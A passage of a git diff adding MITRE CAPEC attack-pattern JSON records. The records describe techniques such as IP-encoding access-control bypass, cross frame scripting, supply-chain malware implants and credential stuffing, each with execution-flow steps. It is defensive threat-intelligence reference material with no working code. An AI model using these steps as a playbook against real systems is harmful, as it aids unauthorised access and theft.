McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00d91a4c-2645-4bf1-8db7-e7448ef25f17", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Using Alternative IP Address Encodings", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies an application server that applies a security policy based on the domain and application name. For example, the access control policy covers authentication and authorization for anyone accessing http://example.domain:8080/application. However, by using the IP address of the host instead (http://192.168.0.1:8080/application), the application authentication and authorization controls may be bypassed. The adversary relies on the victim applying policy to the namespace abstraction and not having a default deny policy in place to manage exceptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for IP addresses as user input: Using a browser, an automated tool or by inspecting the application, an adversary records all entry points to the application where IP addresses are used.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
    Manually inspect the application to find entry points.

Experiment

  1. Probe entry points to locate vulnerabilities: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and attempts alternate IP address encodings, observing application behavior. The adversary will also attempt to access the application through an alternate IP address encoding to see if access control changes

  2. Techniques
    Instead of using a URL, use the IP address that the URL resolves to
    Specify a port directly to a URL input
    Omit or add \"http://\" or \"https://\" to a URL to see if the application behaves differently

Exploit

  1. Bypass access control: Using an alternate IP address encoding, the adversary will either access the application or give the alternate encoding as input, bypassing access control restrictions.

", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target software must fail to anticipate all of the possible valid encodings of an IP/web address.", + "The adversary must have the ability to communicate with the server." + ], + "x_capec_resources_required": [ + "The adversary needs to have knowledge of an alternative IP address encoding that bypasses the access control policy of an application. Alternatively, the adversary can simply try to brute-force various encoding possibilities." + ], + "x_capec_skills_required": { + "Low": "The adversary has only to try IP address format combinations." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json new file mode 100644 index 0000000000000000000000000000000000000000..e13fa2498d623c8c3383344aff70a5eb06ba0e42 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a.json 
@@ -0,0 +1,47 @@
+{
+ "id": "bundle--fe6f08e4-c5b7-46a8-bcba-74e070e9a67f",
+ "objects": [
+ {
+ "created": "2014-06-23T00:00:00.000Z",
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd",
+ "description": "An attacker uses deceptive methods to cause a user or an automated process to download and install dangerous code that originates from an attacker controlled source. There are several variations to this strategy of attack.",
+ "external_references": [
+ {
+ "external_id": "CAPEC-185",
+ "source_name": "capec",
+ "url": "https://capec.mitre.org/data/definitions/185.html"
+ },
+ {
+ "external_id": "CWE-494",
+ "source_name": "cwe",
+ "url": "http://cwe.mitre.org/data/definitions/494.html"
+ }
+ ],
+ "id": "attack-pattern--0123fa83-2d47-4398-85f1-30ce114abb9a",
+ "modified": "2022-09-29T00:00:00.000Z",
+ "name": "Malicious Software Download",
+ "object_marking_refs": [
+ "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d"
+ ],
+ "type": "attack-pattern",
+ "x_capec_abstraction": "Standard",
+ "x_capec_can_follow_refs": [
+ "attack-pattern--d16af13f-5e0f-4a6b-bc1f-23f733d2229b"
+ ],
+ "x_capec_can_precede_refs": [
+ "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862"
+ ],
+ "x_capec_child_of_refs": [
+ "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1"
+ ],
+ "x_capec_domains": [
+ "Software"
+ ],
+ "x_capec_status": "Draft",
+ "x_capec_typical_severity": "Very High",
+ "x_capec_version": "3.9"
+ }
+ ],
+ "spec_version": "2.0",
+ "type": "bundle"
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json
new file mode 100644
index 0000000000000000000000000000000000000000..cf58ae1b255fcca4ba6cb4bac7ebbcb76bc300ff
--- /dev/null
+++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce.json
@@ -0,0 +1,53 @@ +{ + "id": "bundle--0a37fa8f-a546-401d-abbe-86fb154ca01e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates an existing credential in order to gain access to a target application. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. An attacker may be able to manipulate a credential sniffed from an existing connection in order to gain access to a target server.", + "external_references": [ + { + "external_id": "CAPEC-226", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/226.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + } + ], + "id": "attack-pattern--012db73f-2f3c-49f3-bdf3-12ec3eee01ce", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Session Credential Falsification through Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n For example, a credential in the form of a web cookie might have a field that indicates the access rights of a user. By manually tweaking this cookie, a user might be able to increase their access rights to the server. Alternately an attacker may be able to manipulate an existing credential to appear as a different user. 
This attack differs from falsification through prediction in that the user bases their modified credentials off existing credentials instead of using patterns detected in prior credentials to create a new credential that is accepted because it fits the pattern. As a result, an attacker may be able to impersonate other users or elevate their permissions to a targeted service.\n ", + "x_capec_prerequisites": [ + "The targeted application must use session credentials to identify legitimate users." + ], + "x_capec_resources_required": [ + "An attacker will need tools to sniff existing credentials (possibly their own) in order to retrieve a base credential for modification. They will need to understand how the components of the credential affect server behavior and how to manipulate this behavior by changing the credential. Finally, they will need tools to allow them to craft and transmit a modified credential." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json new file mode 100644 index 0000000000000000000000000000000000000000..bf86f0d11b5ab927bf01923c106264207422c6f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--014e5fc2-7564-4775-94aa-220601522b05.json 
@@ -0,0 +1,47 @@ +{ + "id": "bundle--ec12a87d-bd00-4882-b543-f429cf18fae4", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "external_id": "CAPEC-208", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." + ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). 
The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json new file mode 100644 index 0000000000000000000000000000000000000000..4ad62eba9575ffd4a2c76fd876216cfd154e6c81 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408.json 
@@ -0,0 +1,70 @@ +{ + "id": "bundle--1769491d-4eb9-4e12-9f8c-3d73dabca10d", + "objects": [ + { + "created": "2017-02-01T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern combines malicious Javascript and a legitimate webpage loaded into a concealed iframe. The malicious Javascript is then able to interact with a legitimate webpage in a manner that is unknown to the user. This attack usually leverages some element of social engineering in that an attacker must convinces a user to visit a web page that the attacker controls.", + "external_references": [ + { + "external_id": "CAPEC-587", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/587.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + }, + { + "description": "Cross Frame Scripting", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Cross_Frame_Scripting" + }, + { + "description": "Cross Frame Scripting, 2016, OWASP", + "external_id": "REF-469", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Cross_Frame_Scripting" + }, + { + "description": "Gustave Rydstedt, Elie Bursztein, Dan Boneh, and Collin Jackson, Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, 2010--07---20", + "external_id": "REF-470", + "source_name": "reference_from_CAPEC", + "url": "https://seclab.stanford.edu/websec/framebusting/framebust.pdf" + } + ], + "id": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Cross Frame Scripting (XFS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + 
"Confidentiality": [ + "Read Data (Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information." + ], + "x_capec_prerequisites": [ + "The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59.json new file mode 100644 index 0000000000000000000000000000000000000000..9f3949c0411eec4ba662053a070e754b85e0e803 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59.json 
@@ -0,0 +1,100 @@ +{ + "id": "bundle--a48ef11c-e5a4-47c1-a10f-ec909efbc56b", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.", + "external_references": [ + { + "external_id": "CAPEC-682", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-1277", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1277.html" + }, + { + "external_id": "CWE-1310", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1310.html" + }, + { + "description": "Alex Scroxton, Alarm bells ring, the IoT is listening, 2019--12---13, TechTarget", + "external_id": "REF-723", + "source_name": "reference_from_CAPEC", + "url": "https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening" + }, + { + "description": "Matthew Hughes, Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed, 2019--12---11, Situation Publishing", + "external_id": "REF-724", + "source_name": "reference_from_CAPEC", + "url": "https://www.theregister.com/2019/12/11/f_secure_keywe/" + }, + { + "description": "Brian Krebs, Zyxel Flaw Powers New Mirai IoT Botnet Strain, 2020--03---20, Krebs on Security", + "external_id": "REF-725", + "source_name": "reference_from_CAPEC", + "url": "https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/" + }, + { + "description": "Colin Schulz, Stefan Raff, Sebastian Kortmann, Nikolaus Obwegeser, Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm, 
2021--12, International Conference on Information Systems (ICIS) 2021", + "external_id": "REF-726", + "source_name": "reference_from_CAPEC", + "url": "https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm" + } + ], + "id": "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. 
Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.\n ", + "\n Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

  2. Techniques
    Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

  1. Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

  1. Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

  2. Techniques
    Install malware on a device to recruit it for a botnet.
    Install malware on the device and use it for a ransomware attack.
    Gain root access and steal information stored on the device.
    Manipulate the device to behave in unexpected ways which would benefit the adversary.
", + "x_capec_extended_description": "When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged, either physically or remotely." + ], + "x_capec_skills_required": { + "High": "Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely", + "Medium": "Knowledge of various wireless protocols to enable remote access to vulnerable devices" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--02570621-96aa-4525-b782-8e3939affac3.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--02570621-96aa-4525-b782-8e3939affac3.json new file mode 100644 index 0000000000000000000000000000000000000000..a90fdaea504cc153ae9f155ea80c3afceeb912df --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--02570621-96aa-4525-b782-8e3939affac3.json 
@@ -0,0 +1,65 @@ +{ + "id": "bundle--fab6fa4f-6c5e-4e4a-ad4b-d3c31a9390a9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-523", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/523.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Software Implanted", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker has created a piece of malicious software designed to function as a backdoor in a 
system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim's network for further malicious activities." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Entry Point: The adversary must first identify a system that they wish to target and search for an entry point they can use to install the malicious software. This could be a system which they have prior knowledge of, giving them insight into the software and environment.

  2. Techniques
    Use a JTAGulator to identify exposed JTAG and UART interfaces in smaller embedded systems.
    Identify exposed USB connectors that could be used to load software.
  3. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

  4. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test Malicious Software: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

  2. Techniques
    Design malicious software that will give an adversary a backdoor into the system once it is deployed to the victim.
    Obtain already designed malicious software that just need to be placed into the system.

Exploit

  1. Implant Software in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary implants the malicious software into the system. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Malicious software creation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json new file mode 100644 index 0000000000000000000000000000000000000000..7b805afd53ea32f1d4d4d8926c59cd6bf47b3a8f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--b8cd0bd1-eed2-47b2-a25b-4a9ca536499c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-411", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html" + } + ], + "id": "attack-pattern--03093798-f245-4ed2-a085-88e69d303b11", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json new file mode 100644 index 0000000000000000000000000000000000000000..0307a058a10aabe9fa1701cb3c6ba91d1efa6265 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json 
@@ -0,0 +1,153 @@ +{ + "id": "bundle--430ad2b5-d745-4d87-8bc4-aa14b8e2f12d", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.\n ", + "external_references": [ + { + "external_id": "CAPEC-600", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Brute Force:Credential Stuffing", + "external_id": "T1110.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/004" + }, + { + "description": "Credential stuffing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure 
Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + }, + { + "description": "Credential stuffing, Open Web Application Security Project (OWASP)", + "external_id": "REF-568", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times", + "external_id": "REF-569", + "source_name": "reference_from_CAPEC", + "url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/" + } + ], + "id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Stuffing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read 
Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user leverages the password \"Password123\" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.", + "In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

  2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
